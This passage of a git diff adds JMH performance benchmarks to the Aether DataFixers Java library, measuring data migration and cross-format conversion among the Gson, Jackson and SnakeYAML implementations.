+ * + * @see BenchmarkBootstrap#createPlayerFixer() + * @see BenchmarkDataGenerator#generatePlayerData + */ + @State(Scope.Benchmark) + public static class PlayerState { + + /** + * DataFixer configured with a player-specific transformation fix. Performs codec decode → transform → encode + * cycle. + */ + public DataFixer playerFixer; + + /** + * Pre-generated player data structure with realistic game entity fields. + */ + public Dynamic playerInput; + + /** + * Source version for migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + public DataVersion toVersion; + + /** + * Initializes the player benchmark state once per trial. + * + *
+ * <p>Creates the player fixer and generates realistic player test data.</p>
+ */ + @Setup(Level.Trial) + public void setup() { + this.playerFixer = BenchmarkBootstrap.createPlayerFixer(); + this.playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE); + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java new file mode 100644 index 0000000..32b058f --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java @@ -0,0 +1,90 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Core JMH benchmarks for the Aether DataFixers framework. + * + *
+ * <p>This package contains benchmarks that measure the fundamental performance characteristics
+ * of the data fixer system, including fix application, chain execution, and schema registry
+ * operations. These benchmarks form the foundation for performance regression testing and
+ * optimization efforts.</p>
+ * + *
+ * <h2>Benchmark Classes</h2>
+ * <table>
+ *   <tr><th>Class</th><th>Focus Area</th><th>Key Metrics</th></tr>
+ *   <tr><td>{@link de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark}</td><td>Single fix application</td><td>Per-fix overhead, payload size scaling</td></tr>
+ *   <tr><td>{@link de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark}</td><td>Chained fix execution</td><td>Chain length scaling, partial migration cost</td></tr>
+ *   <tr><td>{@link de.splatgames.aether.datafixers.benchmarks.core.SchemaLookupBenchmark}</td><td>Schema registry operations</td><td>Lookup latency, registry size scaling</td></tr>
+ * </table>
+ *
+ * <h2>Running Benchmarks</h2>
+ * <pre>{@code
+ * # Run all core benchmarks
+ * java -jar benchmarks.jar ".*core.*"
+ *
+ * # Run with specific JVM options
+ * java -jar benchmarks.jar ".*core.*" -jvmArgs "-XX:+UseG1GC"
+ *
+ * # Generate JSON report
+ * java -jar benchmarks.jar ".*core.*" -rf json -rff core_results.json
+ * }</pre>
+ * + *
+ * <h2>Benchmark Design Principles</h2>
+ * <ul>
+ *   <li>Isolation: Each benchmark measures a single operation to isolate performance characteristics.</li>
+ *   <li>Parameterization: Benchmarks are parameterized to capture scaling behavior across different input sizes.</li>
+ *   <li>Reproducibility: Fixed seeds and deterministic data generation ensure reproducible results.</li>
+ *   <li>JMH Best Practices: All benchmarks follow JMH guidelines including proper use of {@code Blackhole},
+ *       state scoping, and setup level annotations. A minimal skeleton follows this list.</li>
+ * </ul>
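+ * <p>A minimal skeleton following these practices (class and field names are illustrative;
+ * the generator calls mirror the benchmarks in this package):</p>
+ * <pre>{@code
+ * @State(Scope.Benchmark)
+ * public class ExampleBenchmark {
+ *     private Dynamic<JsonElement> input;
+ *
+ *     @Setup(Level.Trial)                 // prepare data once per trial, not per invocation
+ *     public void setup() {
+ *         input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL);
+ *     }
+ *
+ *     @Benchmark
+ *     public void measure(Blackhole bh) {
+ *         bh.consume(input.get("stringField0"));  // Blackhole defeats dead-code elimination
+ *     }
+ * }
+ * }</pre>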
+ * + *
+ * <h2>Interpreting Results</h2>
+ * <p>All benchmarks in this package report both throughput (ops/time) and average time (time/op).
+ * When comparing results:</p>
+ * <ul>
+ *   <li>Compare measurements from the same JVM version and hardware</li>
+ *   <li>Consider the 99.9% confidence interval (error bounds)</li>
+ *   <li>Run multiple forks to account for JIT compilation variance</li>
+ *   <li>Use baseline benchmarks (e.g., the identity fix) to isolate framework overhead</li>
+ * </ul>
+ * + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.core; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java new file mode 100644 index 0000000..ac0bce9 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java @@ -0,0 +1,361 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps; +import de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for cross-format conversion performance between DynamicOps implementations. + * + *
+ * <p>This benchmark measures the overhead of converting data between different
+ * serialization formats using the {@code DynamicOps.convertTo()} mechanism. Cross-format
+ * conversion is essential when integrating systems that use different data formats
+ * or when migrating data through format-agnostic DataFixers.</p>
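+ * <p>A minimal conversion sketch using the same calls as the benchmark methods below
+ * (the payload size is chosen arbitrarily for illustration):</p>
+ * <pre>{@code
+ * // The target ops pulls the value out of the source ops and rebuilds it
+ * // in its own node type.
+ * JsonElement gson = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL).value();
+ * JsonNode jackson = JacksonJsonOps.INSTANCE.convertTo(GsonOps.INSTANCE, gson);
+ * }</pre>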
+ * + *
+ * <h2>Conversion Pairs Benchmarked</h2>
+ *
+ * <h3>JSON Library Conversions</h3>
+ * <ul>
+ *   <li>{@link #gsonToJackson} - Gson JsonElement → Jackson JsonNode</li>
+ *   <li>{@link #jacksonToGson} - Jackson JsonNode → Gson JsonElement</li>
+ * </ul>
+ * + *
+ * <h3>JSON to YAML Conversions</h3>
+ * <ul>
+ *   <li>{@link #gsonToSnakeYaml} - Gson JsonElement → SnakeYAML Object</li>
+ *   <li>{@link #snakeYamlToGson} - SnakeYAML Object → Gson JsonElement</li>
+ * </ul>
+ * + *
+ * <h3>Jackson Ecosystem Conversions</h3>
+ * <ul>
+ *   <li>{@link #jacksonJsonToYaml} - Jackson JSON → Jackson YAML</li>
+ *   <li>{@link #jacksonYamlToJson} - Jackson YAML → Jackson JSON</li>
+ * </ul>
+ * + *
+ * <h3>YAML Library Conversions</h3>
+ * <ul>
+ *   <li>{@link #snakeYamlToJacksonYaml} - SnakeYAML → Jackson YAML</li>
+ *   <li>{@link #jacksonYamlToSnakeYaml} - Jackson YAML → SnakeYAML</li>
+ * </ul>
+ * + *
+ * <h2>Conversion Matrix</h2>
+ * <table>
+ *   <tr><th>From \ To</th><th>Gson</th><th>Jackson JSON</th><th>SnakeYAML</th><th>Jackson YAML</th></tr>
+ *   <tr><td>Gson</td><td>-</td><td>✓</td><td>✓</td><td>-</td></tr>
+ *   <tr><td>Jackson JSON</td><td>✓</td><td>-</td><td>-</td><td>✓</td></tr>
+ *   <tr><td>SnakeYAML</td><td>✓</td><td>-</td><td>-</td><td>✓</td></tr>
+ *   <tr><td>Jackson YAML</td><td>-</td><td>✓</td><td>✓</td><td>-</td></tr>
+ * </table>
+ * + *
+ * <h2>Parameters</h2>
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM</td><td>Test data complexity</td></tr>
+ * </table>
+ * + *
+ * <h2>Benchmark Configuration</h2>
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>
+ * + *
+ * <h2>Interpreting Results</h2>
+ * <ul>
+ *   <li>Same-ecosystem conversions (e.g., Jackson JSON ↔ Jackson YAML) are
+ *       typically faster due to shared internal representations</li>
+ *   <li>Cross-ecosystem conversions (e.g., Gson ↔ SnakeYAML) require full
+ *       tree traversal and node creation</li>
+ *   <li>Asymmetric performance: A→B may differ from B→A due to different
+ *       source iteration and target construction costs</li>
+ * </ul>
+ * + *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run all cross-format benchmarks
+ * java -jar benchmarks.jar CrossFormatBenchmark
+ *
+ * # Run JSON library conversions only
+ * java -jar benchmarks.jar "CrossFormatBenchmark.*(gson|jackson)To(Gson|Jackson).*"
+ *
+ * # Run YAML conversions only
+ * java -jar benchmarks.jar "CrossFormatBenchmark.*Yaml.*"
+ *
+ * # Compare with specific payload size
+ * java -jar benchmarks.jar CrossFormatBenchmark -p payloadSize=MEDIUM
+ * }</pre>
+ * + * @author Erik Pförtner + * @see JsonBenchmark + * @see YamlBenchmark + * @see TomlXmlBenchmark + * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps#convertTo(DynamicOps, Object) + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class CrossFormatBenchmark { + + /** + * Payload size parameter controlling test data complexity. + * + *
+ * <p>Limited to SMALL and MEDIUM as cross-format conversion overhead
+ * can be significant with large data sets.</p>
+ */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * Google Gson DynamicOps implementation. + */ + private GsonOps gsonOps; + + /** + * Jackson JSON DynamicOps implementation. + */ + private JacksonJsonOps jacksonJsonOps; + + /** + * SnakeYAML DynamicOps implementation using native Java types. + */ + private SnakeYamlOps snakeYamlOps; + + /** + * Jackson YAML DynamicOps implementation. + */ + private JacksonYamlOps jacksonYamlOps; + + /** + * Pre-generated Gson root element for conversion benchmarks. + */ + private JsonElement gsonRoot; + + /** + * Pre-generated Jackson JSON root node for conversion benchmarks. + */ + private JsonNode jacksonJsonRoot; + + /** + * Pre-generated SnakeYAML root object for conversion benchmarks. + */ + private Object snakeYamlRoot; + + /** + * Pre-generated Jackson YAML root node for conversion benchmarks. + */ + private JsonNode jacksonYamlRoot; + + /** + * Initializes all DynamicOps instances and pre-generates test data in each format. + * + *
+ * <p>Data is pre-generated in each format to ensure conversion benchmarks measure
+ * only the conversion overhead, not data generation time.</p>
+ */ + @Setup(Level.Trial) + public void setup() { + this.gsonOps = GsonOps.INSTANCE; + this.jacksonJsonOps = JacksonJsonOps.INSTANCE; + this.snakeYamlOps = SnakeYamlOps.INSTANCE; + this.jacksonYamlOps = JacksonYamlOps.INSTANCE; + + this.gsonRoot = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize).value(); + this.jacksonJsonRoot = BenchmarkDataGenerator.generate(this.jacksonJsonOps, this.payloadSize).value(); + this.snakeYamlRoot = BenchmarkDataGenerator.generate(this.snakeYamlOps, this.payloadSize).value(); + this.jacksonYamlRoot = BenchmarkDataGenerator.generate(this.jacksonYamlOps, this.payloadSize).value(); + } + + // ==================== Gson <-> Jackson JSON Conversions ==================== + + /** + * Benchmarks conversion from Gson JsonElement to Jackson JsonNode. + * + *
+ * <p>Measures the overhead of converting between two JSON libraries.
+ * Both represent JSON but use different internal tree structures.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonToJackson(final Blackhole blackhole) { + final JsonNode result = this.jacksonJsonOps.convertTo(this.gsonOps, this.gsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson JsonNode to Gson JsonElement. + * + *
+ * <p>Measures the reverse conversion from Jackson to Gson representation.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonToGson(final Blackhole blackhole) { + final JsonElement result = this.gsonOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot); + blackhole.consume(result); + } + + // ==================== Gson <-> SnakeYAML Conversions ==================== + + /** + * Benchmarks conversion from Gson JsonElement to SnakeYAML native types. + * + *
+ * <p>Measures cross-ecosystem conversion from a JSON library to a YAML library.
+ * SnakeYAML uses native Java Maps and Lists internally.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonToSnakeYaml(final Blackhole blackhole) { + final Object result = this.snakeYamlOps.convertTo(this.gsonOps, this.gsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from SnakeYAML native types to Gson JsonElement. + * + *
+ * <p>Measures cross-ecosystem conversion from YAML native types to a JSON tree.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlToGson(final Blackhole blackhole) { + final JsonElement result = this.gsonOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot); + blackhole.consume(result); + } + + // ==================== Jackson JSON <-> Jackson YAML Conversions ==================== + + /** + * Benchmarks conversion from Jackson JSON to Jackson YAML. + * + *
+ * <p>Measures conversion within the Jackson ecosystem. Both formats use
+ * JsonNode internally, potentially enabling optimizations.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonJsonToYaml(final Blackhole blackhole) { + final JsonNode result = this.jacksonYamlOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson YAML to Jackson JSON. + * + *
+ * <p>Measures the reverse conversion within the Jackson ecosystem.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlToJson(final Blackhole blackhole) { + final JsonNode result = this.jacksonJsonOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot); + blackhole.consume(result); + } + + // ==================== SnakeYAML <-> Jackson YAML Conversions ==================== + + /** + * Benchmarks conversion from SnakeYAML native types to Jackson YAML JsonNode. + * + *
+ * <p>Measures conversion between two YAML libraries with different internal
+ * representations (native Java types vs JsonNode).</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void snakeYamlToJacksonYaml(final Blackhole blackhole) { + final JsonNode result = this.jacksonYamlOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot); + blackhole.consume(result); + } + + /** + * Benchmarks conversion from Jackson YAML JsonNode to SnakeYAML native types. + * + *
+ * <p>Measures the reverse conversion from JsonNode to native Java Maps/Lists.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonYamlToSnakeYaml(final Blackhole blackhole) { + final Object result = this.snakeYamlOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java new file mode 100644 index 0000000..1a87c58 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java @@ -0,0 +1,410 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.format; + +import com.fasterxml.jackson.databind.JsonNode; +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.jetbrains.annotations.Nullable; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark comparing JSON DynamicOps implementations: Gson vs Jackson. + * + *
+ * <p>This benchmark measures the performance of JSON-based operations using two
+ * different underlying libraries: Google Gson ({@link GsonOps}) and Jackson Databind
+ * ({@link JacksonJsonOps}). The results help determine which implementation is more
+ * suitable for specific use cases.</p>
+ * + *
+ * <h2>Benchmark Categories</h2>
+ *
+ * <h3>Data Generation</h3>
+ * <p>Measure Dynamic object construction performance:</p>
+ * <ul>
+ *   <li>{@link #gsonGenerate} - Create Dynamic using GsonOps</li>
+ *   <li>{@link #jacksonGenerate} - Create Dynamic using JacksonJsonOps</li>
+ * </ul>
+ * + *
+ * <h3>Field Access</h3>
+ * <p>Measure field read operations on existing data:</p>
+ * <ul>
+ *   <li>{@link #gsonFieldRead} - Read field from Gson-backed Dynamic</li>
+ *   <li>{@link #jacksonFieldRead} - Read field from Jackson-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Field Modification</h3>
+ * <p>Measure field write/set operations:</p>
+ * <ul>
+ *   <li>{@link #gsonFieldSet} - Set field on Gson-backed Dynamic</li>
+ *   <li>{@link #jacksonFieldSet} - Set field on Jackson-backed Dynamic</li>
+ * </ul>
+ * + *
+ * <h3>Migration</h3>
+ * <p>Measure DataFixer migration performance:</p>
+ * <ul>
+ *   <li>{@link #gsonMigration} - Apply fix to Gson-backed data</li>
+ *   <li>{@link #jacksonMigration} - Apply fix to Jackson-backed data</li>
+ *   <li>{@link #crossFormatMigrationJacksonInput} - Cross-format migration scenario</li>
+ * </ul>
+ * + *
+ * <h2>Implementations Compared</h2>
+ * <table>
+ *   <tr><th>Implementation</th><th>Library</th><th>Node Type</th><th>Characteristics</th></tr>
+ *   <tr><td>{@link GsonOps}</td><td>Google Gson</td><td>{@code JsonElement}</td><td>Simple API, smaller footprint, widely used</td></tr>
+ *   <tr><td>{@link JacksonJsonOps}</td><td>Jackson Databind</td><td>{@code JsonNode}</td><td>Feature-rich, streaming support, high performance</td></tr>
+ * </table>
+ * + *
+ * <h2>Parameters</h2>
+ * <table>
+ *   <tr><th>Parameter</th><th>Values</th><th>Description</th></tr>
+ *   <tr><td>payloadSize</td><td>SMALL, MEDIUM, LARGE</td><td>Test data complexity</td></tr>
+ * </table>
+ * + *
+ * <h2>Benchmark Configuration</h2>
+ * <table>
+ *   <tr><th>Setting</th><th>Value</th></tr>
+ *   <tr><td>Warmup</td><td>5 iterations, 1 second each</td></tr>
+ *   <tr><td>Measurement</td><td>10 iterations, 1 second each</td></tr>
+ *   <tr><td>Forks</td><td>2</td></tr>
+ *   <tr><td>JVM Heap</td><td>2 GB min/max</td></tr>
+ *   <tr><td>Time Unit</td><td>Microseconds</td></tr>
+ * </table>
+ * + *
+ * <h2>Usage</h2>
+ * <pre>{@code
+ * # Run all JSON benchmarks
+ * java -jar benchmarks.jar JsonBenchmark
+ *
+ * # Compare only field access performance
+ * java -jar benchmarks.jar "JsonBenchmark.*FieldRead"
+ *
+ * # Run Gson-only benchmarks
+ * java -jar benchmarks.jar "JsonBenchmark.gson.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar JsonBenchmark -p payloadSize=LARGE
+ * }</pre>
+ * + * @author Erik Pförtner + * @see YamlBenchmark + * @see TomlXmlBenchmark + * @see CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class JsonBenchmark { + + /** + * Field name used for read/write benchmarks. + * + *
+ * <p>References the first string field generated by {@link BenchmarkDataGenerator}.</p>
+ */ + private static final String FIELD_NAME = "stringField0"; + + /** + * Payload size parameter controlling test data complexity. + * + *
+ * <p>Injected by JMH to run benchmarks across different data sizes.</p>
+ */ + @Param({"SMALL", "MEDIUM", "LARGE"}) + private PayloadSize payloadSize; + + /** + * Google Gson DynamicOps implementation. + */ + private GsonOps gsonOps; + + /** + * Jackson Databind DynamicOps implementation. + */ + private JacksonJsonOps jacksonOps; + + /** + * Pre-generated test data using Gson. + */ + private Dynamic gsonData; + + /** + * Pre-generated test data using Jackson. + */ + private Dynamic jacksonData; + + /** + * DataFixer for Gson-based migrations. + */ + private DataFixer gsonFixer; + + /** + * Optional DataFixer for Jackson-based migrations. + * + *
+ * <p>May be {@code null} if no dedicated Jackson fixer is configured.
+ * In that case, cross-format migration behavior is measured instead.</p>
+ */ + @Nullable + private DataFixer jacksonFixer; + + /** + * Source version for migrations (v1). + */ + private DataVersion fromVersion; + + /** + * Target version for migrations (v2). + */ + private DataVersion toVersion; + + /** + * Initializes DynamicOps instances, test data, and DataFixers. + * + *
+ * <p>Both Gson and Jackson data are pre-generated to isolate benchmark
+ * measurements from data creation overhead (except for the generation benchmarks).</p>
+ */ + @Setup(Level.Trial) + public void setup() { + this.gsonOps = GsonOps.INSTANCE; + this.jacksonOps = JacksonJsonOps.INSTANCE; + + this.gsonData = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize); + this.jacksonData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + + this.gsonFixer = BenchmarkBootstrap.createSingleFixFixer(); + + // If you have a dedicated Jackson fixer, wire it here. Otherwise keep it null and measure cross-format explicitly. + // Example (if you add it later): this.jacksonFixer = BenchmarkBootstrap.createSingleFixFixerJackson(); + this.jacksonFixer = null; + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + } + + // ==================== Data Generation Benchmarks ==================== + + /** + * Benchmarks Dynamic object generation using GsonOps. + * + *
+ * <p>Measures the time to create a complete test data structure using
+ * Gson as the underlying JSON representation.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize); + blackhole.consume(data); + } + + /** + * Benchmarks Dynamic object generation using JacksonJsonOps. + * + *
+ * <p>Measures the time to create a complete test data structure using
+ * Jackson as the underlying JSON representation.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonGenerate(final Blackhole blackhole) { + final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize); + blackhole.consume(data); + } + + // ==================== Field Access Benchmarks ==================== + + /** + * Benchmarks field read access on Gson-backed Dynamic. + * + *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * Gson-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonFieldRead(final Blackhole blackhole) { + final Dynamic field = this.gsonData.get(FIELD_NAME); + blackhole.consume(field); + } + + /** + * Benchmarks field read access on Jackson-backed Dynamic. + * + *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * Jackson-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonFieldRead(final Blackhole blackhole) { + final Dynamic field = this.jacksonData.get(FIELD_NAME); + blackhole.consume(field); + } + + // ==================== Field Modification Benchmarks ==================== + + /** + * Benchmarks field set operation on Gson-backed Dynamic. + * + *
+ * <p>Measures the time to add a new field to a Gson-based Dynamic object.
+ * This operation typically creates a new Dynamic with the modified content.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void gsonFieldSet(final Blackhole blackhole) { + final Dynamic result = this.gsonData.set( + "newField", + this.gsonData.createString("newValue") + ); + blackhole.consume(result); + } + + /** + * Benchmarks field set operation on Jackson-backed Dynamic. + * + *
+ * <p>Measures the time to add a new field to a Jackson-based Dynamic object.</p>
+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void jacksonFieldSet(final Blackhole blackhole) { + final Dynamic result = this.jacksonData.set( + "newField", + this.jacksonData.createString("newValue") + ); + blackhole.consume(result); + } + + // ==================== Migration Benchmarks ==================== + + /** + * Benchmarks DataFixer migration on Gson-backed data. + * + *
+ * <p>Measures the time to apply a single fix migration to Gson-based
+ * Dynamic data. This represents the typical migration scenario where
+ * both fixer and data use the same DynamicOps implementation.</p>
